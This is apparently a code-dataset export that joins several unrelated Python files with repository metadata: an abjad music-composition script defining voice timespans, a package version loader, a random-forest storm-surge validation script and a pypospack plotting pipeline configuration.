[(82, 8), (84, 8), baritone_three_musicmaker_three],
[(84, 8), (86, 8), baritone_three_musicmaker_three],
[(86, 8), (88, 8), baritone_three_musicmaker_three],
[(88, 8), (90, 8), baritone_three_musicmaker_two],
[(90, 8), (92, 8), baritone_three_musicmaker_two],
[(92, 8), (94, 8), baritone_three_musicmaker_two],
[(94, 8), (96, 8), baritone_three_musicmaker_two],
[(96, 8), (98, 8), baritone_three_musicmaker_three],
[(98, 8), (100, 8), baritone_three_musicmaker_three],
[(100, 8), (102, 8), baritone_three_musicmaker_three],
[(102, 8), (104, 8), baritone_three_musicmaker_three],
# [(104, 8), (106, 8), baritone_three_musicmaker_two],
# [(106, 8), (108, 8), baritone_three_musicmaker_two],
# [(108, 8), (110, 8), baritone_three_musicmaker_two],
# [(110, 8), (112, 8), baritone_three_musicmaker_two],
# [(112, 8), (114, 8), baritone_three_musicmaker_three],
# [(114, 8), (116, 8), baritone_three_musicmaker_three],
# [(116, 8), (118, 8), baritone_three_musicmaker_three],
# [(118, 8), (120, 8), baritone_three_musicmaker_three],
# [(120, 8), (122, 8), baritone_three_musicmaker_three],
# [(122, 8), (124, 8), baritone_three_musicmaker_two],
# [(124, 8), (126, 8), baritone_three_musicmaker_two],
# [(126, 8), (128, 8), baritone_three_musicmaker_two],
# [(128, 8), (130, 8), baritone_three_musicmaker_two],
# [(130, 8), (132, 8), baritone_three_musicmaker_two],
# [(132, 8), (134, 8), baritone_three_musicmaker_three],
# [(134, 8), (136, 8), baritone_three_musicmaker_three],
# [(136, 8), (138, 8), baritone_three_musicmaker_three],
# [(138, 8), (140, 8), baritone_three_musicmaker_three],
# [(140, 8), (142, 8), baritone_three_musicmaker_three],
# [(142, 8), (144, 8), baritone_three_musicmaker_two],
# [(144, 8), (146, 8), baritone_three_musicmaker_two],
# [(146, 8), (148, 8), baritone_three_musicmaker_two],
# [(148, 8), (150, 8), baritone_three_musicmaker_two],
# [(150, 8), (152, 8), baritone_three_musicmaker_two],
# [(152, 8), (154, 8), baritone_three_musicmaker_three],
# [(154, 8), (156, 8), baritone_three_musicmaker_three],
# [(156, 8), (158, 8), baritone_three_musicmaker_three],
# [(158, 8), (160, 8), baritone_three_musicmaker_three],
# [(160, 8), (162, 8), baritone_three_musicmaker_three],
# [(162, 8), (164, 8), baritone_three_musicmaker_two],
# [(164, 8), (166, 8), baritone_three_musicmaker_two],
# [(166, 8), (168, 8), baritone_three_musicmaker_two],
# [(168, 8), (170, 8), baritone_three_musicmaker_two],
# [(170, 8), (172, 8), baritone_three_musicmaker_two],
# [(172, 8), (174, 8), baritone_three_musicmaker_two],
# [(174, 8), (176, 8), baritone_three_musicmaker_three],
# [(176, 8), (178, 8), baritone_three_musicmaker_three],
# [(178, 8), (180, 8), baritone_three_musicmaker_three],
# [(180, 8), (182, 8), baritone_three_musicmaker_three],
# [(182, 8), (184, 8), baritone_three_musicmaker_three],
# [(184, 8), (186, 8), baritone_three_musicmaker_three],
# [(186, 8), (188, 8), baritone_three_musicmaker_two],
# [(188, 8), (190, 8), baritone_three_musicmaker_two],
# [(190, 8), (192, 8), baritone_three_musicmaker_two],
# [(192, 8), (194, 8), baritone_three_musicmaker_two],
# [(194, 8), (196, 8), baritone_three_musicmaker_two],
# [(196, 8), (198, 8), baritone_three_musicmaker_two],
# [(198, 8), (199, 8), baritone_three_musicmaker_two],
]
])
voice_19_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 19',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), bass_one_musicmaker_two],
[(2, 8), (4, 8), bass_one_musicmaker_two],
[(4, 8), (6, 8), bass_one_musicmaker_two],
[(6, 8), (8, 8), bass_one_musicmaker_three],
[(8, 8), (10, 8), bass_one_musicmaker_three],
[(10, 8), (12, 8), bass_one_musicmaker_two],
[(12, 8), (14, 8), bass_one_musicmaker_two],
[(14, 8), (16, 8), bass_one_musicmaker_two],
[(16, 8), (18, 8), bass_one_musicmaker_two],
[(18, 8), (20, 8), bass_one_musicmaker_three],
[(20, 8), (22, 8), bass_one_musicmaker_two],
[(22, 8), (24, 8), bass_one_musicmaker_two],
[(24, 8), (26, 8), bass_one_musicmaker_two],
[(26, 8), (28, 8), bass_one_musicmaker_two],
[(28, 8), (30, 8), bass_one_musicmaker_two],
[(30, 8), (32, 8), bass_one_musicmaker_three],
[(32, 8), (34, 8), bass_one_musicmaker_three],
[(34, 8), (36, 8), bass_one_musicmaker_three],
[(36, 8), (38, 8), bass_one_musicmaker_three],
[(38, 8), (40, 8), bass_one_musicmaker_three],
[(40, 8), (42, 8), bass_one_musicmaker_three],
[(42, 8), (44, 8), bass_one_musicmaker_three],
[(44, 8), (46, 8), bass_one_musicmaker_three],
[(46, 8), (48, 8), bass_one_musicmaker_two],
[(48, 8), (50, 8), bass_one_musicmaker_two],
[(50, 8), (52, 8), bass_one_musicmaker_two],
[(52, 8), (54, 8), bass_one_musicmaker_two],
[(54, 8), (56, 8), bass_one_musicmaker_two],
[(56, 8), (58, 8), bass_one_musicmaker_two],
[(58, 8), (60, 8), bass_one_musicmaker_three],
[(60, 8), (62, 8), bass_one_musicmaker_three],
[(62, 8), (64, 8), bass_one_musicmaker_three],
[(64, 8), (68, 8), bass_one_musicmaker_three],
[(68, 8), (70, 8), bass_one_musicmaker_three],
[(70, 8), (72, 8), bass_one_musicmaker_three],
[(72, 8), (74, 8), bass_one_musicmaker_three],
[(74, 8), (76, 8), bass_one_musicmaker_two],
[(76, 8), (78, 8), bass_one_musicmaker_two],
[(78, 8), (80, 8), bass_one_musicmaker_two],
[(80, 8), (82, 8), bass_one_musicmaker_two],
[(82, 8), (84, 8), bass_one_musicmaker_two],
[(84, 8), (86, 8), bass_one_musicmaker_two],
[(86, 8), (88, 8), bass_one_musicmaker_two],
[(88, 8), (90, 8), bass_one_musicmaker_three],
[(90, 8), (92, 8), bass_one_musicmaker_three],
[(92, 8), (94, 8), bass_one_musicmaker_three],
[(94, 8), (96, 8), bass_one_musicmaker_three],
[(96, 8), (98, 8), bass_one_musicmaker_three],
[(98, 8), (100, 8), bass_one_musicmaker_three],
[(100, 8), (102, 8), bass_one_musicmaker_two],
[(102, 8), (104, 8), bass_one_musicmaker_two],
# [(104, 8), (106, 8), bass_one_musicmaker_two],
# [(106, 8), (108, 8), bass_one_musicmaker_two],
# [(108, 8), (110, 8), bass_one_musicmaker_two],
# [(110, 8), (112, 8), bass_one_musicmaker_two],
# [(112, 8), (114, 8), bass_one_musicmaker_two],
# [(114, 8), (116, 8), bass_one_musicmaker_two],
# [(116, 8), (118, 8), bass_one_musicmaker_three],
# [(118, 8), (120, 8), bass_one_musicmaker_three],
# [(120, 8), (122, 8), bass_one_musicmaker_three],
# [(122, 8), (124, 8), bass_one_musicmaker_three],
# [(124, 8), (126, 8), bass_one_musicmaker_three],
# [(126, 8), (128, 8), bass_one_musicmaker_two],
# [(128, 8), (130, 8), bass_one_musicmaker_three],
# [(130, 8), (132, 8), bass_one_musicmaker_three],
# [(132, 8), (134, 8), bass_one_musicmaker_three],
# [(134, 8), (136, 8), bass_one_musicmaker_three],
# [(136, 8), (138, 8), bass_one_musicmaker_two],
# [(138, 8), (140, 8), bass_one_musicmaker_two],
# [(140, 8), (142, 8), bass_one_musicmaker_three],
# [(142, 8), (144, 8), bass_one_musicmaker_three],
# [(144, 8), (146, 8), bass_one_musicmaker_three],
# [(146, 8), (148, 8), bass_one_musicmaker_two],
# [(148, 8), (150, 8), bass_one_musicmaker_two],
# [(150, 8), (152, 8), bass_one_musicmaker_two],
# [(152, 8), (154, 8), bass_one_musicmaker_three],
# [(154, 8), (156, 8), bass_one_musicmaker_three],
# [(156, 8), (158, 8), bass_one_musicmaker_two],
# [(158, 8), (160, 8), bass_one_musicmaker_two],
# [(160, 8), (162, 8), bass_one_musicmaker_two],
# [(162, 8), (164, 8), bass_one_musicmaker_two],
# [(164, 8), (168, 8), bass_one_musicmaker_three],
# [(168, 8), (170, 8), bass_one_musicmaker_two],
# [(170, 8), (172, 8), bass_one_musicmaker_two],
# [(172, 8), (174, 8), bass_one_musicmaker_two],
# [(174, 8), (176, 8), bass_one_musicmaker_two],
# [(176, 8), (178, 8), bass_one_musicmaker_two],
# [(178, 8), (180, 8), bass_one_musicmaker_three],
# [(180, 8), (182, 8), bass_one_musicmaker_three],
# [(182, 8), (184, 8), bass_one_musicmaker_three],
# [(184, 8), (186, 8), bass_one_musicmaker_three],
# [(186, 8), (188, 8), bass_one_musicmaker_three],
# [(188, 8), (190, 8), bass_one_musicmaker_three],
# [(190, 8), (192, 8), bass_one_musicmaker_three],
# [(192, 8), (194, 8), bass_one_musicmaker_three],
# [(194, 8), (196, 8), bass_one_musicmaker_two],
# [(196, 8), (198, 8), bass_one_musicmaker_two],
# [(198, 8), (199, 8), bass_one_musicmaker_two],
]
])
voice_20_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 20',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), bass_two_musicmaker_two],
[(2, 8), (4, 8), bass_two_musicmaker_two],
[(4, 8), (6, 8), bass_two_musicmaker_two],
[(6, 8), (8, 8), bass_two_musicmaker_three],
[(8, 8), (10, 8), bass_two_musicmaker_three],
[(10, 8), (12, 8), bass_two_musicmaker_two],
[(12, 8), (14, 8), bass_two_musicmaker_two],
[(14, 8), (16, 8), bass_two_musicmaker_two],
[(16, 8), (18, 8), bass_two_musicmaker_two],
[(18, 8), (20, 8), bass_two_musicmaker_three],
[(20, 8), (22, 8), bass_two_musicmaker_two],
[(22, 8), (24, 8), bass_two_musicmaker_two],
[(24, 8), (26, 8), bass_two_musicmaker_two],
[(26, 8), (28, 8), bass_two_musicmaker_two],
[(28, 8), (30, 8), bass_two_musicmaker_two],
[(30, 8), (32, 8), bass_two_musicmaker_three],
[(32, 8), (34, 8), bass_two_musicmaker_three],
[(34, 8), (36, 8), bass_two_musicmaker_three],
[(36, 8), (38, 8), bass_two_musicmaker_three],
[(38, 8), (40, 8), bass_two_musicmaker_three],
[(40, 8), (42, 8), bass_two_musicmaker_three],
[(42, 8), (44, 8), bass_two_musicmaker_three],
[(44, 8), (46, 8), bass_two_musicmaker_three],
[(46, 8), (48, 8), bass_two_musicmaker_two],
[(48, 8), (50, 8), bass_two_musicmaker_two],
[(50, 8), (52, 8), bass_two_musicmaker_two],
[(52, 8), (54, 8), bass_two_musicmaker_two],
[(54, 8), (56, 8), bass_two_musicmaker_two],
[(56, 8), (58, 8), bass_two_musicmaker_two],
[(58, 8), (60, 8), bass_two_musicmaker_three],
[(60, 8), (62, 8), bass_two_musicmaker_three],
[(62, 8), (64, 8), bass_two_musicmaker_three],
[(64, 8), (68, 8), bass_two_musicmaker_three],
[(68, 8), (70, 8), bass_two_musicmaker_three],
[(70, 8), (72, 8), bass_two_musicmaker_three],
[(72, 8), (74, 8), bass_two_musicmaker_three],
[(74, 8), (76, 8), bass_two_musicmaker_two],
[(76, 8), (78, 8), bass_two_musicmaker_two],
[(78, 8), (80, 8), bass_two_musicmaker_two],
[(80, 8), (82, 8), bass_two_musicmaker_two],
[(82, 8), (84, 8), bass_two_musicmaker_two],
[(84, 8), (86, 8), bass_two_musicmaker_two],
[(86, 8), (88, 8), bass_two_musicmaker_two],
[(88, 8), (90, 8), bass_two_musicmaker_three],
[(90, 8), (92, 8), bass_two_musicmaker_three],
[(92, 8), (94, 8), bass_two_musicmaker_three],
[(94, 8), (96, 8), bass_two_musicmaker_three],
[(96, 8), (98, 8), bass_two_musicmaker_three],
[(98, 8), (100, 8), bass_two_musicmaker_three],
[(100, 8), (102, 8), bass_two_musicmaker_two],
[(102, 8), (104, 8), bass_two_musicmaker_two],
# [(104, 8), (106, 8), bass_two_musicmaker_two],
# [(106, 8), (108, 8), bass_two_musicmaker_two],
# [(108, 8), (110, 8), bass_two_musicmaker_two],
# [(110, 8), (112, 8), bass_two_musicmaker_two],
# [(112, 8), (114, 8), bass_two_musicmaker_two],
# [(114, 8), (116, 8), bass_two_musicmaker_two],
# [(116, 8), (118, 8), bass_two_musicmaker_three],
# [(118, 8), (120, 8), bass_two_musicmaker_three],
# [(120, 8), (122, 8), bass_two_musicmaker_three],
# [(122, 8), (124, 8), bass_two_musicmaker_three],
# [(124, 8), (126, 8), bass_two_musicmaker_three],
# [(126, 8), (128, 8), bass_two_musicmaker_two],
# [(128, 8), (130, 8), bass_two_musicmaker_three],
# [(130, 8), (132, 8), bass_two_musicmaker_three],
# [(132, 8), (134, 8), bass_two_musicmaker_three],
# [(134, 8), (136, 8), bass_two_musicmaker_three],
# [(136, 8), (138, 8), bass_two_musicmaker_two],
# [(138, 8), (140, 8), bass_two_musicmaker_two],
# [(140, 8), (142, 8), bass_two_musicmaker_three],
# [(142, 8), (144, 8), bass_two_musicmaker_three],
# [(144, 8), (146, 8), bass_two_musicmaker_three],
# [(146, 8), (148, 8), bass_two_musicmaker_two],
# [(148, 8), (150, 8), bass_two_musicmaker_two],
# [(150, 8), (152, 8), bass_two_musicmaker_two],
# [(152, 8), (154, 8), bass_two_musicmaker_three],
# [(154, 8), (156, 8), bass_two_musicmaker_three],
# [(156, 8), (158, 8), bass_two_musicmaker_two],
# [(158, 8), (160, 8), bass_two_musicmaker_two],
# [(160, 8), (162, 8), bass_two_musicmaker_two],
# [(162, 8), (164, 8), bass_two_musicmaker_two],
# [(164, 8), (168, 8), bass_two_musicmaker_three],
# [(168, 8), (170, 8), bass_two_musicmaker_two],
# [(170, 8), (172, 8), bass_two_musicmaker_two],
# [(172, 8), (174, 8), bass_two_musicmaker_two],
# [(174, 8), (176, 8), bass_two_musicmaker_two],
# [(176, 8), (178, 8), bass_two_musicmaker_two],
# [(178, 8), (180, 8), bass_two_musicmaker_three],
# [(180, 8), (182, 8), bass_two_musicmaker_three],
# [(182, 8), (184, 8), bass_two_musicmaker_three],
# [(184, 8), (186, 8), bass_two_musicmaker_three],
# [(186, 8), (188, 8), bass_two_musicmaker_three],
# [(188, 8), (190, 8), bass_two_musicmaker_three],
# [(190, 8), (192, 8), bass_two_musicmaker_three],
# [(192, 8), (194, 8), bass_two_musicmaker_three],
# [(194, 8), (196, 8), bass_two_musicmaker_two],
# [(196, 8), (198, 8), bass_two_musicmaker_two],
# [(198, 8), (199, 8), bass_two_musicmaker_two],
]
])
voice_21_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 21',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), contrabass_musicmaker_two],
[(2, 8), (4, 8), contrabass_musicmaker_two],
[(4, 8), (6, 8), contrabass_musicmaker_two],
[(6, 8), (8, 8), contrabass_musicmaker_three],
[(8, 8), (10, 8), contrabass_musicmaker_three],
[(10, 8), (12, 8), contrabass_musicmaker_two],
[(12, 8), (14, 8), contrabass_musicmaker_two],
[(14, 8), (16, 8), contrabass_musicmaker_two],
[(16, 8), (18, 8), contrabass_musicmaker_two],
[(18, 8), (20, 8), contrabass_musicmaker_three],
[(20, 8), (22, 8), contrabass_musicmaker_two],
[(22, 8), (24, 8), contrabass_musicmaker_two],
[(24, 8), (26, 8), contrabass_musicmaker_two],
[(26, 8), (28, 8), contrabass_musicmaker_two],
[(28, 8), (30, 8), contrabass_musicmaker_two],
[(30, 8), (32, 8), contrabass_musicmaker_three],
[(32, 8), (34, 8), contrabass_musicmaker_three],
[(34, 8), (36, 8), contrabass_musicmaker_three],
[(36, 8), (38, 8), contrabass_musicmaker_three],
[(38, 8), (40, 8), contrabass_musicmaker_three],
[(40, 8), (42, 8), contrabass_musicmaker_three],
[(42, 8), (44, 8), contrabass_musicmaker_three],
[(44, 8), (46, 8), contrabass_musicmaker_three],
[(46, 8), (48, 8), contrabass_musicmaker_two],
[(48, 8), (50, 8), contrabass_musicmaker_two],
[(50, 8), (52, 8), contrabass_musicmaker_two],
[(52, 8), (54, 8), contrabass_musicmaker_two],
[(54, 8), (56, 8), contrabass_musicmaker_two],
[(56, 8), (58, 8), contrabass_musicmaker_two],
[(58, 8), (60, 8), contrabass_musicmaker_three],
[(60, 8), (62, 8), contrabass_musicmaker_three],
[(62, 8), (64, 8), contrabass_musicmaker_three],
[(64, 8), (68, 8), contrabass_musicmaker_three],
[(68, 8), (70, 8), contrabass_musicmaker_three],
[(70, 8), (72, 8), contrabass_musicmaker_three],
[(72, 8), (74, 8), contrabass_musicmaker_three],
[(74, 8), (76, 8), contrabass_musicmaker_two],
[(76, 8), (78, 8), contrabass_musicmaker_two],
[(78, 8), (80, 8), contrabass_musicmaker_two],
[(80, 8), (82, 8), contrabass_musicmaker_two],
[(82, 8), (84, 8), contrabass_musicmaker_two],
[(84, 8), (86, 8), contrabass_musicmaker_two],
[(86, 8), (88, 8), contrabass_musicmaker_two],
[(88, 8), (90, 8), contrabass_musicmaker_three],
[(90, 8), (92, 8), contrabass_musicmaker_three],
[(92, 8), (94, 8), contrabass_musicmaker_three],
[(94, 8), (96, 8), contrabass_musicmaker_three],
[(96, 8), (98, 8), contrabass_musicmaker_three],
[(98, 8), (100, 8), contrabass_musicmaker_three],
[(100, 8), (102, 8), contrabass_musicmaker_two],
[(102, 8), (104, 8), contrabass_musicmaker_two],
# [(104, 8), (106, 8), contrabass_musicmaker_two],
# [(106, 8), (108, 8), contrabass_musicmaker_two],
# [(108, 8), (110, 8), contrabass_musicmaker_two],
# [(110, 8), (112, 8), contrabass_musicmaker_two],
# [(112, 8), (114, 8), contrabass_musicmaker_two],
# [(114, 8), (116, 8), contrabass_musicmaker_two],
# [(116, 8), (118, 8), contrabass_musicmaker_three],
# [(118, 8), (120, 8), contrabass_musicmaker_three],
# [(120, 8), (122, 8), contrabass_musicmaker_three],
# [(122, 8), (124, 8), contrabass_musicmaker_three],
# [(124, 8), (126, 8), contrabass_musicmaker_three],
# [(126, 8), (128, 8), contrabass_musicmaker_two],
# [(128, 8), (130, 8), contrabass_musicmaker_three],
# [(130, 8), (132, 8), contrabass_musicmaker_three],
# [(132, 8), (134, 8), contrabass_musicmaker_three],
# [(134, 8), (136, 8), contrabass_musicmaker_three],
# [(136, 8), (138, 8), contrabass_musicmaker_two],
# [(138, 8), (140, 8), contrabass_musicmaker_two],
# [(140, 8), (142, 8), contrabass_musicmaker_three],
# [(142, 8), (144, 8), contrabass_musicmaker_three],
# [(144, 8), (146, 8), contrabass_musicmaker_three],
# [(146, 8), (148, 8), contrabass_musicmaker_two],
# [(148, 8), (150, 8), contrabass_musicmaker_two],
# [(150, 8), (152, 8), contrabass_musicmaker_two],
# [(152, 8), (154, 8), contrabass_musicmaker_three],
# [(154, 8), (156, 8), contrabass_musicmaker_three],
# [(156, 8), (158, 8), contrabass_musicmaker_two],
# [(158, 8), (160, 8), contrabass_musicmaker_two],
# [(160, 8), (162, 8), contrabass_musicmaker_two],
# [(162, 8), (164, 8), contrabass_musicmaker_two],
# [(164, 8), (168, 8), contrabass_musicmaker_three],
# [(168, 8), (170, 8), contrabass_musicmaker_two],
# [(170, 8), (172, 8), contrabass_musicmaker_two],
# [(172, 8), (174, 8), contrabass_musicmaker_two],
# [(174, 8), (176, 8), contrabass_musicmaker_two],
# [(176, 8), (178, 8), contrabass_musicmaker_two],
# [(178, 8), (180, 8), contrabass_musicmaker_three],
# [(180, 8), (182, 8), contrabass_musicmaker_three],
# [(182, 8), (184, 8), contrabass_musicmaker_three],
# [(184, 8), (186, 8), contrabass_musicmaker_three],
# [(186, 8), (188, 8), contrabass_musicmaker_three],
# [(188, 8), (190, 8), contrabass_musicmaker_three],
# [(190, 8), (192, 8), contrabass_musicmaker_three],
# [(192, 8), (194, 8), contrabass_musicmaker_three],
# [(194, 8), (196, 8), contrabass_musicmaker_two],
# [(196, 8), (198, 8), contrabass_musicmaker_two],
# [(198, 8), (199, 8), contrabass_musicmaker_two],
]
])
# Create a dictionary mapping voice names to timespan lists so we can
# maintain the association in later operations:
all_timespans = [
voice_1_timespan_list,
voice_2_timespan_list,
voice_3_timespan_list,
voice_4_timespan_list,
voice_5_timespan_list,
voice_6_timespan_list,
voice_7_timespan_list,
voice_8_timespan_list,
voice_9_timespan_list,
voice_10_timespan_list,
voice_11_timespan_list,
voice_12_timespan_list,
voice_13_timespan_list,
voice_14_timespan_list,
voice_15_timespan_list,
voice_16_timespan_list,
voice_17_timespan_list,
voice_18_timespan_list,
voice_19_timespan_list,
voice_20_timespan_list,
voice_21_timespan_list,
]
all_timespan_lists = abjad.TimespanList([])
all_timespan_lists = make_showable_list(all_timespans)
abjad.show(all_timespan_lists,
key='annotation',
scale=2
)
| [
"gregoryrowlandevans@gmail.com"
] | gregoryrowlandevans@gmail.com |
2c40f53838408287189e489b19df5fc1ec20aa1a | 8b675ca56bae3a1b622eff991f8786963712d12f | /a301/__init__.py | e85022d2ce213a276ce0bce421a914b1172f3500 | [
"MIT"
] | permissive | KayhanB21/a301_code | b4dd7d8bdb2a4170211965abee707f48da4cbb23 | 4237b4e538bd999f5ac1b20f6b25b4c4e03bb09c | refs/heads/master | 2021-09-23T14:39:14.333193 | 2018-09-24T19:44:50 | 2018-09-24T19:44:50 | 150,385,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 633 | py | from pathlib import Path
#
# Read the package version from the VERSION file that lives next to this
# module and expose it as a301.__version__.
# https://github.com/pypa/setuptools/issues/1316
#
__version_file__ = Path(__file__).parent / 'VERSION'
#
# If the VERSION file doesn't exist, try to create it and write
# 'no_version'.  If that fails (e.g. the install location is read-only),
# set __version_file__ to None so callers know no VERSION file exists.
#
if not __version_file__.is_file():
    __version__ = 'no_version'
    try:
        __version_file__.write_text(__version__)
    except OSError:
        # Catch only file-system errors: a bare except would also swallow
        # KeyboardInterrupt/SystemExit and hide unrelated bugs.
        __version_file__ = None
else:
    __version__ = __version_file__.read_text().strip()
| [
"paustin@eos.ubc.ca"
] | paustin@eos.ubc.ca |
9545e13460cfa481d9ae30dc5b02b4f93977fc49 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merraRF882/61-tideGauge.py | e49c8cf3e8885cfd243aea28ac1f410de445d6df | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,454 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 61
y = 62
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
#filter only .csv files
tgNames = []
for file in glob.glob("*.csv"):
tgNames.append(file)
tg_name = sorted(tgNames)[tg]
print(tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
print("this tide gauge is already taken care of")
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
min_samples_leaf = 1)
rf.fit(X_train, y_train)
#predictions
predictions = rf.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
print()
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#run script
validateRF()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
0de82ef4d599b7fcb1e8c91a95fdb1238c215f5d | a5a4cee972e487512275c34f308251e6cc38c2fa | /examples/Ni__eam__born_exp_fs__postprocessing/Reduced_TSNE_qoi_in_param/configuration/configure_final_plot.py | bb505c0bb91236afab1d0c898c0312a5a119c4d8 | [
"MIT"
] | permissive | eragasa/pypospack | 4f54983b33dcd2dce5b602bc243ea8ef22fee86b | 21cdecaf3b05c87acc532d992be2c04d85bfbc22 | refs/heads/master | 2021-06-16T09:24:11.633693 | 2019-12-06T16:54:02 | 2019-12-06T16:54:02 | 99,282,824 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | from collections import OrderedDict
from pypospack.pyposmat.data.pipeline import PyposmatPipeline
pipeline_configuration = OrderedDict()
# define first segment (plotting)
pipeline_configuration[0] = OrderedDict()
pipeline_configuration[0]['segment_type'] = 'plot'
pipeline_configuration[0]['function_calls'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['function'] = 'plot_by_cluster'
pipeline_configuration[0]['function_calls'][0]['args'] = OrderedDict()
pipeline_configuration[0]['function_calls'][0]['args']['x_axis'] = 'tsne_0'
pipeline_configuration[0]['function_calls'][0]['args']['y_axis'] = 'tsne_1'
pipeline_configuration[0]['function_calls'][0]['args']['filename'] = 'qoi_clusters_in_param_tsne_space.png'
if __name__ == "__main__":
pipeline = PyposmatPipeline()
fn = __file__.replace('.py', '.in')
pipeline.write_configuration(filename=fn,
d=pipeline_configuration)
| [
"seatonullberg@gmail.com"
